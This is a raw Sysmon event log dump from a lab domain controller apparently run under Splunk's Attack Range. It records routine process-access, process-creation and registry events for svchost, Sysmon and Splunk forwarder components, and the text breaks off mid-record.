13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85F1-5FCF-4A01-000000009101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F1-5FCF-4A01-000000009101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.539{10ACEC4A-85F1-5FCF-4A01-000000009101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.507{10ACEC4A-85F0-5FCF-4901-000000009101}30561244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+201f2b|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6c153|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 13241300x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localT1031,T1050SetValue2020-12-08 13:56:01.491{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localT1031,T1050SetValue2020-12-08 13:56:01.491{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.491{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 13241300x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:01.210{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd69-0xdcb4d1b8) 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F2-5FCF-4C01-000000009101}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85F2-5FCF-4C01-000000009101}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.881{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program 